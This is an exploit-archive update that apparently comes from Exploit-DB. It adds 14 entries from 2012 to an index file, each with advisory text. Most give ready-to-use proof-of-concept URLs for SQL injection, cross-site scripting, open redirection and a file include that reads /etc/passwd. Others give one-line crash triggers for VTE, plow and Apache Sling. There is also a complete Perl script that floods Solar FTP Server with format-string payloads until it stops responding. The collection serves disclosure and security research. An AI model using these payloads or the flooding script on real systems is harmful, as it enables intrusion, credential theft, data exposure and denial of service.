DB: 2015-07-05

14 new exploits

files.csv

@@ -33820,3 +33820,17 @@ id,file,description,date,author,platform,type,port
 37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
 37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
 37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
+37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
+37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
+37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
+37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP 'admin.php' Multiple SQL Injection Vulnerabilities",2012-07-04,snup,php,webapps,0
+37480,platforms/windows/dos/37480.pl,"Solar FTP Server Denial of Service Vulnerability",2012-07-05,coolkaveh,windows,dos,0
+37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin 'msg' Parameter Cross Site Scripting Vulnerability",2012-07-06,"Sammy FORGIT",php,webapps,0
+37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability",2012-07-03,"Sammy FORGIT",php,webapps,0
+37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin 'id' parameter Cross-Site Scripting Vulnerability",2012-07-06,"Sammy FORGIT",php,webapps,0
+37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin Cross Site Scripting Vulnerability",2012-07-06,"Sammy FORGIT",php,webapps,0
+37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat 'url' Parameter Cross Site Scripting Vulnerability",2012-07-05,"Sammy FORGIT",php,webapps,0
+37486,platforms/php/webapps/37486.txt,"sflog! 'section' Parameter Local File Include Vulnerability",2012-07-06,dun,php,webapps,0
+37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
+37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
+37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0

platforms/asp/webapps/37488.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54346/info
+
+WebsitePanel is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+WebsitePanel versions prior to 1.2.2.1 are vulnerable. 
+
+https://www.example.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>
+https://www.example1.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>/file.exe> 

platforms/linux/dos/37477.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/54281/info
+
+VTE is prone to a vulnerability that may allow attackers to cause an affected application to consume excessive amounts of memory and CPU time, resulting in a denial-of-service condition. 
+
+echo -en "\e[2147483647L"
+echo -en "\e[2147483647M"
+echo -en "\e[2147483647P" 

platforms/multiple/dos/37478.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54290/info
+
+plow is prone to a buffer-overflow vulnerability.
+
+Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+plow 0.0.5 and prior are vulnerable. 
+
+perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc 

platforms/multiple/dos/37487.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54341/info
+
+Apache Sling is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to exhaust available memory, resulting in a denial-of-service condition.
+
+Apache Sling 2.1.0 and prior are vulnerable. 
+
+ curl -u admin:pwd -d "" "http://example.com/content/foo/?./%40CopyFrom=../" 
+

platforms/php/webapps/37476.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/54271/info
+
+php MBB is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+php MBB 0.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mbbcms/?ref=search&q=' + [SQL Injection]
+http://www.example.com/mbbcms/?mod=article&act=search&q=' + [SQL Injection]
+
+http://www.example.com/mbbcms/?ref=search&q= [XSS]
+http://www.example.com/mbbcms/?mod=article&act=search&q= [XSS] 

platforms/php/webapps/37479.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/54299/info
+
+Classified Ads Script PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Classified Ads Script PHP 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/test/classifiedscript/admin.php?act=ads&orderType=[ ASC/ DESC ]&search=&orderBy=[SQL-INJECTION]
+
+http://www.example.com/test/classifiedscript/admin.php?act=ads&orderType=[SQL-INJECTION]
+
+http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType=[ASC / DESC ]&search=&orderBy=[SQL-INJECTION]
+
+http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType[SQL-INJECTION] 

platforms/php/webapps/37481.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54320/info
+
+SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SocialFit 1.2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%28123%29%3C/script%3E 

platforms/php/webapps/37482.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54326/info
+
+WordPress custom tables plugin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+custom tables 3.4.4 is vulnerable; prior versions may also be affected. 
+
+
+http://www.example.com/wordpress/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E 

platforms/php/webapps/37483.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54329/info
+
+The church_admin plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+church_admin plugin Version 0.33.4.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E 

platforms/php/webapps/37484.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54330/info
+
+Knews Multilingual Newsletters for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Knews Multilingual Newsletters 1.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E 

platforms/php/webapps/37485.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54332/info
+
+PHPFreeChat is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PHPFreeChat 0.2.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
+

platforms/php/webapps/37486.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54334/info
+
+sflog! is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
+
+sflog! 1.00 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd 

platforms/php/webapps/37489.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/54348/info
+
+MGB is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MGB 0.6.9.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1
+
+http://www.example.com/mgb/index.php?p=1â??"</script><script>alert(document.cookie)</script> [XSS]
+
+http://www.example.com/mgb/newentry.php [XSS] 

platforms/windows/dos/37480.pl

@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/54306/info
+
+Solar FTP Server is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to force the affected application to become unresponsive, denying service to legitimate users.
+
+Solar FTP Server 2.2 is vulnerable; other versions may also be affected. 
+
+# Exploit Title: Solar FTP Server 2.2 Remote DOS crash POC
+# crash:http://img542.imageshack.us/img542/7633/solar.jpg
+# Date: July 4, 2012
+# Author: coolkaveh
+# coolkaveh () rocketmail com
+# https://twitter.com/coolkaveh
+# Vendor Homepage: http://solarftp.com/
+# Version: 2.2
+# Tested on: windows XP SP3
+#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+#When sending multiple parallel crafted request to a Solar FTP Server
+it gets crash
+#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Crappy Solar FTP Server Remote Denial Of Service
+#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+#!/usr/bin/perl -w
+use IO::Socket;
+use Parallel::ForkManager;
+$|=1;
+sub usage {
+    print "Crappy FTP Server Remote Denial Of Service\n";
+    print "by coolkaveh\n";
+    print "usage: perl killftp.pl <host> \n";
+    print "example: perl Crappyftp.pl www.example.com \n";
+}
+$host=shift;
+$port=shift || "21";
+if(!defined($host)){
+    print "Crappy FTP Server Remote Denial Of Service\n";
+    print "by coolkaveh\n";
+        print "coolkaveh () rocketmail com\n";
+    print "usage: perl killftp.pl <host> \n";
+    print "example: perl Crappyftp.pl www.example.com \n";
+        exit(0);
+}
+$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
+if(defined $check_first){
+        print "$host -> $port is alive.\n";
+        $check_first->close;
+}
+else{
+die("$host -> $port is closed!\n");
+}
+@junk=('A'x5,'l%q%j%z%Z'x1000,
+'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s',
+'%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
+'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x57,'-1','0','0x100',
+'0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1',
+);
+@command=(
+'NLST','CWD','STOR','RETR','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
+'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE
+L','TYPE I','NLST','CWD','MKD','RMD',
+'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
+'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE
+L','TYPE I','NLST','CWD',
+);
+print "Crashing Server!\n";
+while (1) {
+   COMMAND_LIST: foreach $cmd (@command){
+        foreach $poc (@junk){
+                LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
+PeerPort=>$port, Proto=>'tcp', Timeout=>30);
+                if(defined($sock4)){
+                $sock4->send("$cmd"." "."$poc\r\n", 0);
+                $sock4->send("$poc\r\n", 0);
+                        
+                                }
+                        }
+                }               
+
+}